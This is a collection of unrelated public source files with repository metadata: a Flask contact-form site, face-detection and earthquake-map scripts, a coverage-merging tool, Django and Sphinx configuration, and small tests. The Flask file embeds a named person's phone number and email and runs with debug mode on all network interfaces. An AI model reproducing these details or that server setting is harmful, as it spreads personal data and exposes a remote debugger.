# Contact: http://127.0.0.1:5000/Contact
# Configure email
app = Flask(__name__)
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 465
# ~~~~~~~~~~~~~~~ INSERT YOUR EMAIL HERE ! ~~~~~~~~~~~~~~~~~
default_email = "any_gmail_dummy@gmail.com"
default_password = "dummy_gmail_password"
app.config['MAIL_USERNAME'] = default_email
app.config['MAIL_PASSWORD'] = default_password
# Display error in console if an email wasn`t inserted
if app.config['MAIL_USERNAME'] == default_email:
print("\n<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ATTENTION >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print("Watch out! For the contact page to submit an email to me correctly, you have to insert \
in the code, as mentioned in the README, a valid email address!");
print("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< ATTENTION >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n")
print("Website: http://127.0.0.1:5000/index\n")
# Mail setup
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
mail = Mail(app)
# Index page
@app.route('/index')
def home():
meta = {"title": "Home"}
meta.update({"icon": "https://static.thenounproject.com/png/2048828-200.png"})
contact_data = {"name": "Chelcea Claudiu", "status": "Computer Science & Engineering Student",
"gmail": "claudiuchelcea01@gmail.com", "number": "(+40) 763 665 892"}
return render_template("index.html", title=meta, contact=contact_data)
# Contact page
@app.route('/Contact', methods=['GET', 'POST'])
def contact():
meta = {"title": "Contact page"}
meta.update({"icon": "https://i.pinimg.com/originals/bb/18/bd/bb18bdbbef437b2d50518db5a8292c94.png"})
reason = ["Other", "Project", "Job offer"]
return render_template("Contact.html", title=meta, reasons=reason)
# Thank you page
@app.route('/ThankYou', methods=["POST"])
def thankyou():
meta = {"title": "Thank you"}
meta.update({"icon": "https://img.freepik.com/free-icon/present-box-with-big-bow_318-9536.jpg?size=338&ext=jpg"})
name = request.form.get("name")
email = request.form.get("email")
reason = ["Other", "Project", "Job offer"]
message = request.form.get("message")
company = request.form.get("company")
phone = request.form.get("phone")
meta.update({"name": name})
meta.update({"email": email})
meta.update({"message": message})
meta.update({"company": company})
meta.update({"phone": phone})
if not name or not email or not message or not phone or not company:
meta["title"] = "Error"
meta["icon"] = "https://www.freeiconspng.com/thumbs/error-icon/error-icon-3.png"
return render_template("Error.html", title=meta, reasons=reason)
meta["title"] = "Thank you"
meta["icon"] = "https://img.freepik.com/free-icon/present-box-with-big-bow_318-9536.jpg?size=338&ext=jpg"
reason = request.form.get("reason")
# Configure an email at line 15 for the submit button to work correctly
msg = Message('Form submission', sender=default_email, recipients=['claudiuchelcea01@gmail.com'])
msg.body = "Name: " + name + "\n" + "Company: " + company + "\nEmail: " + email + "\nPhone number: " + \
phone + "\n\nContact reason: " + reason + "\nMessage: " + message
mail.send(msg)
return render_template("ThankYou.html", title=meta, reasons=reason)
# Server
if __name__ == "__main__":
# Only for debugging while developing
app.run(host='0.0.0.0', debug=True, port=5000)
| [
"noreply@github.com"
] | ClaudiuChelcea.noreply@github.com |
4133d8de12e950deab0ef7eb66dff3ef852e342b | 5cc1421f5280c4c869e5df5b936f4d629693d0f1 | /main.py | 139b340dbacec7bbaa8633419be07b3aeef61f1e | [
"MIT"
] | permissive | zhangxujinsh/MTCNN-VS | 96c38479fa6e6aa5dea0e855cddcf8548ea7872d | 42d79c0a8954493fd8afb4a6665584da9a8b9c6e | refs/heads/master | 2020-07-11T01:51:40.142178 | 2016-10-29T02:13:57 | 2016-10-29T02:17:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,875 | py | # coding: utf-8
import mxnet as mx
from mtcnn_detector import MtcnnDetector
import cv2
import os
import time
def testimg(detector):
img = cv2.imread('test.jpg')
t1 = time.time()
results = detector.detect_face(img)
print 'time: ',time.time() - t1
if results is not None:
total_boxes = results[0]
points = results[1]
draw = img.copy()
for b in total_boxes:
cv2.rectangle(draw, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), (255, 255, 255))
for p in points:
for i in range(5):
cv2.circle(draw, (p[i], p[i + 5]), 1, (0, 0, 255), 2)
cv2.imshow("detection result", draw)
cv2.imwrite("result.png", draw)
cv2.waitKey(0)
# --------------
# test on camera
# --------------
def testcamera(detector):
camera = cv2.VideoCapture(0)
while True:
grab, frame = camera.read()
img = cv2.resize(frame, (320,180))
t1 = time.time()
results = detector.detect_face(img)
print 'time: ',time.time() - t1
if results is None:
cv2.imshow("detection result", img)
cv2.waitKey(1)
continue
total_boxes = results[0]
points = results[1]
draw = img.copy()
for b in total_boxes:
cv2.rectangle(draw, (int(b[0]), int(b[1])), (int(b[2]), int(b[3])), (255, 255, 255))
for p in points:
for i in range(5):
cv2.circle(draw, (p[i], p[i + 5]), 1, (255, 0, 0), 2)
cv2.imshow("detection result", draw)
key=cv2.waitKey(1)
if 'q'==chr(key & 255) or 'Q'==chr(key & 255):
break;
if __name__=="__main__":
detector = MtcnnDetector(model_folder='model', ctx=mx.gpu(0), num_worker = 4 , accurate_landmark = False)
# testimg(detector)
testcamera(detector) | [
"1293830063@qq.com"
] | 1293830063@qq.com |
0d6192d9c96cea55cce85588b2f9354cbdb21b81 | b7ddb90ae9fbcf831edb2495e7e65b9cebb0498e | /RawrfenServer/coord.py | cb195b7aee34367aa3d3008886876b742b540f69 | [] | no_license | Astarisk/RawrfenWeb | c60ee04e0e6e5c57ff662bc903cacaaa308c2882 | 227d49cc074e81f4c3df272750225fd00211d6eb | refs/heads/master | 2023-03-09T11:52:38.425461 | 2022-12-16T18:19:06 | 2022-12-16T18:19:06 | 138,544,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | class Coord:
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return "({0} {1})".format(self.x, self.y)
def __repr__(self):
return "Coord({0} , {1})".format(self.x, self.y)
def mul(self, f):
return Coord(self.x * f.x, self.y * f.y)
class Coord2d:
def __int__(self):
pass
| [
"astarisk@gmail.com"
] | astarisk@gmail.com |
ad867cae223caa2d23bb5107206d641e399b3f90 | e70238ae0e2fc3cec3659b3ddac84d48f87b8dad | /.svn/pristine/ad/ad867cae223caa2d23bb5107206d641e399b3f90.svn-base | 41944f2510338a6d2a1e2de80eaff5acc6713fee | [] | no_license | rzk1/cp2k-mcgill | 8cc92ae6097265644b9014657c7c4f220dfc2c35 | 56e0ed32a825e5e82004bdcef707e24c25f56a43 | refs/heads/master | 2021-01-20T17:40:15.918278 | 2019-07-11T18:08:13 | 2019-07-11T18:08:13 | 64,575,680 | 2 | 2 | null | 2019-08-07T17:38:51 | 2016-07-31T03:47:36 | Fortran | UTF-8 | Python | false | false | 4,433 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# author: Ole Schuett
import sys
from os import path
#===============================================================================
def main():
if(len(sys.argv) != 3):
print("Usage: bcast_tmpl_coverage.py <lcov_in.info> <lcov_out.info>")
print("Broadcasts coverage stats across all template instances.")
sys.exit(1)
fn_in, fn_out = sys.argv[1:]
print("Reading "+fn_in)
content = open(fn_in).read()
# pass 1: find all records
records = dict()
curr_record = []
curr_fn = None
for line in content.split("\n"):
curr_record.append(line)
if(line.startswith("SF:")):
curr_fn = line[3:]
#print(curr_fn)
elif(line.startswith("end_of_record")):
if(not records.has_key(curr_fn)):
records[curr_fn] = list()
records[curr_fn] += curr_record
curr_record = []
curr_fn = None
# pass 3: sort records
content_sorted = []
for k in sorted(records.keys()):
content_sorted += records[k]
# pass 4: join records into broadcast groups
groups = []
prev_fn = prev_line_nums = None
curr_fn = curr_line_nums = None
curr_group = []
for line in content_sorted:
curr_group.append(line)
if(line.startswith("SF:")):
prev_fn = curr_fn
prev_line_nums = curr_line_nums
curr_fn = line[3:]
curr_line_nums = []
#print(curr_fn)
elif(line[:3] in ("FN:", "DA:")):
lineno = int(line[3:].split(",")[0])
curr_line_nums.append(lineno)
elif(line.startswith("end_of_record")):
if(similar(curr_fn, prev_fn) and curr_line_nums==prev_line_nums):
groups[-1] += curr_group
print("Broadcasting: "+path.basename(prev_fn), "<->",path.basename(curr_fn))
else:
groups.append(curr_group)
curr_group = [] # start a new group
output = []
for group in groups:
FNs = dict()
FNDAs = dict()
DAs = dict()
# pass 5: broadcast coverage stats within groups
for line in group:
if(line.startswith("FN:")):
lno, name = line[3:].split(",")
FNs[name] = lno
elif(line.startswith("FNDA:")):
count, name = line[5:].split(",")
uid = FNs[name] if(name in FNs) else name
FNDAs[uid] = max(int(count), FNDAs.get(uid, 0))
elif(line.startswith("DA:")):
lno, count = line[3:].split(",")
DAs[lno] = max(int(count), DAs.get(lno, 0))
# pass 6: write new records
for line in group:
if(line.startswith("FNDA:")):
count, name = line[5:].split(",")
uid = FNs[name] if(name in FNs) else name
output.append( "FNDA:%d,%s"%(FNDAs[uid], name) )
elif(line.startswith("DA:")):
lno, count = line[3:].split(",")
output.append( "DA:%s,%d"%(lno,DAs[lno]) )
elif(line.startswith("LH:")):
count = len([v for v in DAs.values() if v>0])
output.append( "LH:%d"%count )
elif(line.startswith("FNH:")):
count = len([v for v in FNDAs.values() if v>0])
output.append( "FNH:%d"%count )
else:
output.append(line)
print("Writting "+fn_out)
f = open(fn_out, "w")
f.write("\n".join(output))
f.close()
#===============================================================================
def similar(a, b):
""" Checks if two filenames are very similar """
if(a==None or b==None): return(False)
if(path.dirname(a) != path.dirname(b)): return(False)
a_base, a_ext = path.basename(a).rsplit(".", 1)
b_base, b_ext = path.basename(b).rsplit(".", 1)
if(a_ext != b_ext): return(False)
a_parts = a_base.split("_")
b_parts = b_base.split("_")
if(len(a_parts) != len(b_parts)): return(False)
diffs = len(a_parts) - sum([i==j for i,j in zip(a_parts, b_parts)])
return(diffs == 1) # at most one field may differ
#===============================================================================
if(len(sys.argv)==2 and sys.argv[-1]=="--selftest"):
pass #TODO implement selftest
else:
main()
#EOF
| [
"rustam@khaliullin.com"
] | rustam@khaliullin.com | |
479b96bffec928063f8a1b56155e43ecb94f2fa9 | fa4bc02ccbc8cdd8d09507b96f40f3bb4b8b7549 | /DashApp/pages/map.py | d81d3c133441b6948452388851efb20561e1897a | [
"MIT"
] | permissive | violet-love/quake-ds | 1800d1a3df222413728a757d09ce294219c1dd5f | 8dfdcd48c80b0310a97808668677a5baf636122d | refs/heads/master | 2021-03-11T03:37:16.924918 | 2020-03-10T02:49:29 | 2020-03-10T02:49:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,412 | py | import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.express as px
import plotly.graph_objs as go
import requests
import pandas as pd
from app import app
column1 = dbc.Col(
[
dcc.Markdown(
"""
## This is a map of recent earthquakes
select from the drop down menu what period of time you would like
to see earthquakes for.
"""
),
html.Div([
dcc.Dropdown(
id='timeFrame',
options=[
{'label': 'Last Quake', 'value': 'lastQuake'},
{'label': 'Last Hour', 'value': 'last/hour'},
{'label': 'Last Day', 'value': 'last/day'},
{'label': 'Last Week', 'value': 'last/week'},
{'label': 'Last Month', 'value': 'last/month'}
],
value='lastQuake'
),
html.Div(id='menuItems')
])
],
md=2,
)
#fig = go.Figure()
@app.callback(
dash.dependencies.Output('wheretheDataGoes', 'figure'),
[dash.dependencies.Input('timeFrame', 'value')])
def update_output(value):
data = requests.get(f'https://quake-ds-production.herokuapp.com/{value}')
df = pd.DataFrame(data.json()['message']) if value != 'lastQuake' else \
pd.DataFrame(data.json()['message'], index=[0])
df['lat'] = df['lat'].apply(lambda x: str(x))
df['lon'] = df['lon'].apply(lambda x: str(x))
data = [
go.Scattermapbox(
lat=df['lat'],
lon=df['lon'],
mode='markers',
marker=go.scattermapbox.Marker(
size=14
),
text=df['place'],
)
]
layout = go.Layout(
autosize=True,
hovermode='closest',
mapbox=go.layout.Mapbox(
bearing=0,
center=go.layout.mapbox.Center(
lat=0,
lon=0
),
pitch=0,
zoom=.5
),
)
fig = go.Figure(data=data, layout=layout)
fig.update_layout(mapbox_style='stamen-terrain', height=700)
return fig
column2 = dbc.Col([
dcc.Graph(id='wheretheDataGoes'),
])
layout = dbc.Row([column1, column2], style={'margin-top': 100, 'height': 1000})
| [
"eyvonne@users.noreply.github.com"
] | eyvonne@users.noreply.github.com |
23763377163d76db4dd43f0f81a90b02e45179da | 50debf18fe2fda56780aecfa81004fc351301fc7 | /carbike/apps.py | 4f2443f8058b15c5fb3a4a632dac25ea4d71076c | [] | no_license | koumaron/carbike | 97d52626f1aa0317eac1bed701c5a46241715d7b | bbbe41d64b77e28256d4483bd3f83ca255b6e068 | refs/heads/main | 2023-02-18T23:12:16.701550 | 2021-01-20T06:12:25 | 2021-01-20T06:12:25 | 331,205,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from django.apps import AppConfig
class CarbikeConfig(AppConfig):
name = 'carbike'
| [
"noreply@github.com"
] | koumaron.noreply@github.com |
8d85aaa01325ea01f6ece159131b127ef9047799 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-gsn-edf.0/gsn-edf_ut=3.5_rd=0.5_rw=0.06_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=26/sched.py | 1613dd9b0c794754a75a5de64bc5ac7319aa1a66 | [] | no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 342 | py | -X FMLP -Q 0 -L 3 95 400
-X FMLP -Q 0 -L 3 66 300
-X FMLP -Q 0 -L 3 54 175
-X FMLP -Q 1 -L 2 53 200
-X FMLP -Q 1 -L 2 50 200
-X FMLP -Q 1 -L 2 44 175
-X FMLP -Q 2 -L 2 34 125
-X FMLP -Q 2 -L 2 34 175
-X FMLP -Q 3 -L 1 33 175
-X FMLP -Q 3 -L 1 31 200
28 150
25 175
24 125
20 200
20 150
18 150
14 175
13 100
9 125
| [
"ricardo.btxr@gmail.com"
] | ricardo.btxr@gmail.com |
ba1619c95c501c1725a03a9611066e17c4f2a417 | 8b51fbf7473328cd5f7cdf5cc4d1fdb45fc020e0 | /config.py | 8c70a0cd2694f7a43d4c9dcd8b1e545a55dcab70 | [] | no_license | akesling/turntable | 46e058049c1f2a210a5fdef2f8a8340aefdf344d | 7d2caba99df97040597b31b3f9103f022834d57b | refs/heads/master | 2021-01-13T02:22:59.205735 | 2013-06-28T19:40:52 | 2013-06-28T19:40:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | """
Read in config.yaml and appropriately set all the right values before kicking
the server into a runnable state
"""
def configurate(runner_class):
return runner_class()
| [
"ahkeslin@ncsu.edu"
] | ahkeslin@ncsu.edu |
7647f571a4f3a7aae87186379f8096ae77a5b759 | 3d904ce25b91fe6699b76b4a45f0f4e37438200f | /tests/test_slice.py | 9ded28fb242ee22c11a90ef34758d9d12ffb7a07 | [
"BSD-3-Clause"
] | permissive | mverleg/pyjson_tricks | 0dc91822a404e5d33dbd70fe23d903ebc9f7d36c | b79572f0397bc91a06f698e3e5cd9f435af84907 | refs/heads/master | 2023-09-01T22:03:19.157624 | 2023-08-19T11:57:05 | 2023-08-19T11:57:05 | 45,618,882 | 160 | 30 | NOASSERTION | 2023-08-19T11:57:06 | 2015-11-05T15:08:05 | Python | UTF-8 | Python | false | false | 461 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pathlib import Path
from json_tricks import dumps, loads
def test_slice():
original_slice = slice(0, 10, 2)
json_slice = dumps(original_slice)
loaded_slice = loads(json_slice)
assert original_slice == loaded_slice
def test_slice_no_step():
original_slice = slice(0, 5)
json_slice = dumps(original_slice)
loaded_slice = loads(json_slice)
assert original_slice == loaded_slice
| [
"claydugo@gmail.com"
] | claydugo@gmail.com |
4881f64525acb3d6be61b2f586019ec4effe954b | d39f42a4c6c49373a4c762f382101461cc75333f | /CheckingErrors.py | f877ea5f593703cec212d140d780dac128f7c486 | [] | no_license | anil3830/python | e5243db6d74b31e0c16a2eee90abd1d09062e163 | 30e177cd5f469541449da561fbc6fe0ade6ac76b | refs/heads/master | 2020-09-15T20:27:57.425691 | 2019-12-18T05:12:21 | 2019-12-18T05:12:21 | 223,550,861 | 0 | 0 | null | 2019-12-18T05:12:22 | 2019-11-23T07:41:50 | Python | UTF-8 | Python | false | false | 707 | py | #cheacking errors by using try, except , else, finally , key words
#ex multiple exception
'''try:
a=int(input('enter a value'))
d=int(input('enter d value'))
c=a/d
print(c)
except ZeroDivisionError as x:
print('the error is in',x)
##except TypeError as x:
print('the error is in',x)
except NameError as x:
print('the error is',x)
except ValueError as x:
print('the error is in',x)
finally:
print('thank you')'''
#
#
#single exception in multiple errors
n=int(input('enter any value'))
m=int(input('enter a number'))
try:
c=n+m
print(c)
except (ZeroDivisionError,NameError,TypeError,ValueError) as x:
print('the error is in ',x)
finally:
print('thank you') | [
"anilkumarjan1596@gmail.com"
] | anilkumarjan1596@gmail.com |
7451ee26f6d5e08fe204c925922a69b00af273e2 | bbc1e0f8e744d28660415d3d9348f43049222391 | /main/migrations/0027_auto_20200411_1429.py | 941f1b82974a2ef7082b60144217ae567bf2fc6c | [] | no_license | heronvas/website | 44b628edae251489218b4f1d1d689ec3fef952cd | f10ea7c3689f52fa6f51216590541f7786609125 | refs/heads/master | 2022-11-09T23:34:54.042537 | 2020-06-23T20:52:25 | 2020-06-23T20:52:25 | 274,256,774 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | # Generated by Django 2.1.5 on 2020-04-11 08:59
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0026_auto_20200411_0331'),
]
operations = [
migrations.AlterField(
model_name='disco',
name='date',
field=models.DateTimeField(default=datetime.datetime(2020, 4, 11, 14, 29, 38, 186863), verbose_name='date published'),
),
migrations.AlterField(
model_name='tutorialseries',
name='series_date',
field=models.DateTimeField(default=datetime.datetime(2020, 4, 11, 14, 29, 38, 153861), verbose_name='date published'),
),
]
| [
"heronvas897@gmail.com"
] | heronvas897@gmail.com |
665051f43c02a29b8087979305e3cca1abec9664 | fff02bef975f1ca5af8744bf1fe8fc98f2d838fe | /guessTheNumber.py | c1c60c673aa16e04968e58f497f83222d09adb86 | [] | no_license | mjcupial/PYTHON | 5aaa414694a97c9138bf5f03c72ba13e9d54492f | dfe000a1c3694fbcbbacdef54021f3519c71c801 | refs/heads/master | 2023-02-21T23:13:18.784731 | 2023-02-10T21:06:07 | 2023-02-10T21:06:07 | 82,818,336 | 1 | 0 | null | 2023-01-20T12:42:30 | 2017-02-22T15:11:17 | Python | UTF-8 | Python | false | false | 1,452 | py | # PC, just guess the number!
#
# The gamer chosses the number in previously defined range.
# The PC must guess what is the number!
# by mj.c
import random
decision = 'y'
while (decision == 'y' or decision == 'Y'):
print("Hi! I would like to guess your number! I would like to try...")
print("but first please define the range as: from x to y")
x = int(input("\nx: "))
y = int(input("y: "))
# check logic condition of range
while (y <= x):
print("WRONG! Give correct values!")
x = int(input("\nx: "))
y = int(input("y: "))
PC_number = random.randint(x,y)
tries=1
the_number = int(input("\n### Gamer! Give the number: "))
# check the_number value
while (the_number > y or the_number < x):
print("Wow! It doesn't make sense! Try again...")
the_number = int(input("\n### Gamer! Give the number: "))
# guess loop
while PC_number != the_number:
if PC_number > the_number:
print("too high...")
PC_number = random.randint(x,PC_number)
else:
print("too low...")
PC_number = random.randint(PC_number,y)
tries += 1
print("You've got it! The unknow number is: ", the_number)
print("To guess it, the PC needed only", tries, "probes!\n")
decision=input("\n\nWould you like to try again? [y/n]: ")
input("\n\nPress ENTER to continue...")
| [
"noreply@github.com"
] | mjcupial.noreply@github.com |
51094e4e71590548d90f213ebaed4ce7b2c32fbf | 513085337c4b73e3843caa6d1b9b6a74d62b5564 | /conf.py | eb84e4a08e82f8be30cc151a34b0394194fc273b | [] | no_license | Fklag/TS_ISN | 705f727888b172fbfede7ea8dc5854198c2adf0f | 9b9fd44dacbf16e8d963a0a16215521cbbceccc0 | refs/heads/master | 2020-05-17T01:07:51.695294 | 2015-06-17T10:12:10 | 2015-06-17T10:12:10 | 37,211,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,777 | py | # -*- coding: utf-8 -*-
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../modules'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.mathjax',
'luther.sphinx.video',
'luther.sphinx.reveal',
'luther.sphinx.poll',
'luther.sphinx.tabbedStuff',
'luther.sphinx.disqus',
'luther.sphinx.codelens',
'luther.sphinx.activecode',
'luther.sphinx.assess',
'luther.sphinx.animation',
'luther.sphinx.meta',
'gatech.parsons']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Informatique et Sciences du Numérique' # e.g. How To Think Like a Computer Scientist
copyright = u'2015, F. Lagrave' # e.g. "2013, Brad Miller and David Ranum"
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['ActiveIndexFiles/*']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the Sphinx documentation
# for a list of builtin themes.
html_theme = 'sphinx_bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
html_theme_options = {
# Navigation bar title. (Default: ``project`` value)
'navbar_title': "TS ISN",
# Tab name for entire site. (Default: "Site")
'navbar_site_name': "Chapitres",
# Global TOC depth for "site" navbar tab. (Default: 1)
# Switching to -1 shows all levels.
'globaltoc_depth': 1,
# Include hidden TOCs in Site navbar?
#
# Note: If this is "false", you cannot have mixed ``:hidden:`` and
# non-hidden ``toctree`` directives in the same page, or else the build
# will break.
#
# Values: "true" (default) or "false"
'globaltoc_includehidden': "true",
# HTML navbar class (Default: "navbar") to attach to <div> element.
# For dark navbar, do "navbar navbar-inverse"
'navbar_class': "navbar",
# Fix navigation bar to top of page?
# Values: "true" (default) or "false"
'navbar_fixed_top': "true",
# Location of link to source.
# Options are "nav" (default), "footer" or anything else to exclude.
'source_link_position': "nav",
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["_templates"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'CS Principles'
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title ='TS ISN'
# Logo is currently included as CSS background in default layout file. If you remove
# it there, you should specify an alternative image here.
#html_logo = "../source/_static/logo_small.png"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
module_paths = [x.replace('.','/') for x in extensions]
module_static_js = ['../modules/%s/js' % x for x in module_paths if os.path.exists('../modules/%s/js' % x)]
module_static_css = ['../modules/%s/css' % x for x in module_paths if os.path.exists('../modules/%s/css' % x)]
html_static_path = ['_static',
'../common/js',
'../common/css',
'../common/bootstrap',
'../common/images'] + module_static_js + module_static_css
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# Output file base name for HTML help builder.
htmlhelp_basename = 'PythonCoursewareProjectdoc'
| [
"lycee.lagrave@free.fr"
] | lycee.lagrave@free.fr |
c6d89d295ee2dcc983253c82b25ad3252232ab12 | 733c19907e231cbc61603b1a644a78b2a113f6e3 | /rules/context.py | 53a196a65fb4251467489a0557b197e1a93dbdf1 | [] | no_license | wilysword/rule-reactor | 997be60b13c82f3bf58aa099f1e6780389608709 | 7ace02ed34da297bde3fccc41312ad6d8c89a5f6 | refs/heads/master | 2021-01-20T23:32:09.971508 | 2014-09-23T20:13:04 | 2014-09-23T20:13:04 | 38,435,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,236 | py | import logging
from copy import deepcopy
from django.db.models.signals import (
post_init, pre_save, post_save, pre_delete, post_delete
)
from .cache import RuleCache, TopicalRuleCache
from .continuations import ContinuationStore, NoContinuationError
logger = logging.getLogger(__name__)
class RuleChecker(object):
__slots__ = ('cache', 'context', '_cont', 'continuations')
def __init__(self, **kwargs):
cls = kwargs.get('cls') or TopicalRuleCache
if 'cache' in kwargs:
cache = kwargs.get('cache')
elif 'rules' in kwargs:
cache = cls()
for r in kwargs['rules']:
cache.add_source(r.trigger, r)
elif 'queryset' in kwargs:
cache = cls(RuleCache(kwargs['queryset']))
elif 'source' in kwargs:
cache = cls(kwargs['source'])
elif hasattr(cls, 'default'):
cache = cls.default
else:
raise ValueError('No rules, rule cache, or rule source provided.')
used = {'cls', 'rules', 'cache', 'queryset', 'source',
'context', 'continuations'}
context = {k: kwargs[k] for k in kwargs if k not in used}
context.update(kwargs.get('context', ()))
self.context = context
self.cache = cache
self._cont = kwargs.get('continuations') or ContinuationStore.default
def check(self, trigger, *objects, **extra):
info = {'objects': objects, 'extra': extra}
matches = self.cache[trigger]._matches(info)
for rule in matches:
try:
rule.continue_(info, self.continuations)
except NoContinuationError:
logger.debug('Continuation not found', exc_info=True)
return matches
def __enter__(self):
self.continuations = self._cont.bind(self.context)
return self
def __exit__(self, *exc_info):
self.continuations.unbind()
del self.continuations
def check_rules(*args, **kwargs):
if not args:
return lambda func: check_rules(func, **kwargs)
elif len(args) != 1 or not callable(args[0]):
raise TypeError('Requires exactly one callable positional argument')
func = args[0]
rc = RuleChecker(**kwargs)
@functools.wraps(func)
def wrapper(request, *a, **k):
with rc:
request.rule_checker = rc
return func(request, *a, **k)
return wrapper
class SignalChecker(RuleChecker):
__slots__ = ('user', 'models', 'objects')
def __init__(self, user, *models, **kwargs):
super(SignalChecker, self).__init__(**kwargs)
self.user = user
self.models = models
self.objects = {}
def track(self, obj):
"""
Tracks an object so that edits can be properly distinguished from adds.
"""
model = type(obj)
is_tracked = any(issubclass(model, m) for m in self.models)
if self.models and not is_tracked:
msg = 'This checker only tracks objects of the following types: {}'
model_names = ', '.join(m.__name__ for m in self.models)
raise ValueError(msg.format(model_names))
self._track(instance=obj, sender=model)
def _track(self, **kwargs):
obj = kwargs['instance']
if obj.pk:
self.objects[(kwargs['sender'], obj.pk)] = deepcopy(obj)
def _get_trigger(self, eventtype, model, sig=None):
m = model._meta.concrete_model._meta
key = '{}.{}.{}'.format(eventtype, m.app_label, m.object_name.lower())
if sig:
key += ':' + sig
return key
def _check_update(self, sender, instance, sig=None):
if instance.pk not in self.objects:
# Can't check rules without sufficient info.
return
original = self.objects[instance.pk]
trigger = self._get_trigger('update', sender, sig)
self.check(trigger, original, instance, user=self.user)
if not sig or 'post' in sig:
self._track(sender=sender, instance=instance)
def _check_create(self, sender, instance, sig=None):
trigger = self._get_trigger('create', sender, sig)
self.check(trigger, instance, user=self.user)
if not sig or 'post' in sig:
self._track(sender=sender, instance=instance)
def _check_pres(self, sender, **kwargs):
i = kwargs['instance']
if i.pk:
self._check_update(sender, i, 'pre_save')
else:
self._check_create(sender, i, 'pre_save')
def _check_posts(self, sender, **kwargs):
i = kwargs['instance']
if kwargs['created']:
self._check_create(sender, i)
else:
self._check_update(sender, i)
def _check_pred(self, sender, **kwargs):
i = kwargs['instance']
trigger = self._get_trigger('delete', sender, 'pre_delete')
self.check(trigger, i, user=self.user)
def _check_postd(self, sender, **kwargs):
i = kwargs['instance']
trigger = self._get_trigger('delete', sender)
self.check(trigger, i, user=self.user)
if i.pk in self.objects:
del self.objects[i.pk]
def _connect(self, sender=None):
post_init.connect(self._track, sender=sender)
pre_save.connect(self._check_pres, sender=sender)
post_save.connect(self._check_posts, sender=sender)
pre_delete.connect(self._check_pred, sender=sender)
post_delete.connect(self._check_postd, sender=sender)
def _disconnect(self, sender=None):
post_init.disconnect(self._track, sender=sender)
pre_save.disconnect(self._check_pres, sender=sender)
post_save.disconnect(self._check_posts, sender=sender)
pre_delete.disconnect(self._check_pred, sender=sender)
post_delete.disconnect(self._check_postd, sender=sender)
def __enter__(self):
"""
Connects signals so the RuleChecker will know when to check rules and
whether the action is an add, edit or delete.
"""
if self.models:
for m in self.models:
self._connect(m)
else:
self._connect()
return super(SignalChecker, self).__enter__()
def __exit__(self, *exc_info):
"""Disconnects signals."""
if self.models:
for m in self.models:
self._disconnect(m)
else:
self._disconnect()
super(SignalChecker, self).__exit__()
def check_signals(*args, **kwargs):
if not args:
return lambda func: check_signals(func, **kwargs)
elif len(args) != 1 or not callable(args[0]):
raise TypeError('Requires exactly one callable positional argument')
func = args[0]
models = kwargs.pop('models', None) or ()
# Validate arguments using the constructor.
sc = SignalChecker(None, *models, **kwargs)
# Though we can't reuse the instance, we can reuse the cache.
kwargs.setdefault('cache', sc.cache)
@functools.wraps(func)
def wrapper(request, *a, **k):
with SignalChecker(request.user, *models, **kwargs) as sc:
request.signal_checker = sc
return func(request, *a, **k)
return wrapper
| [
"gphelps@verisys.com"
] | gphelps@verisys.com |
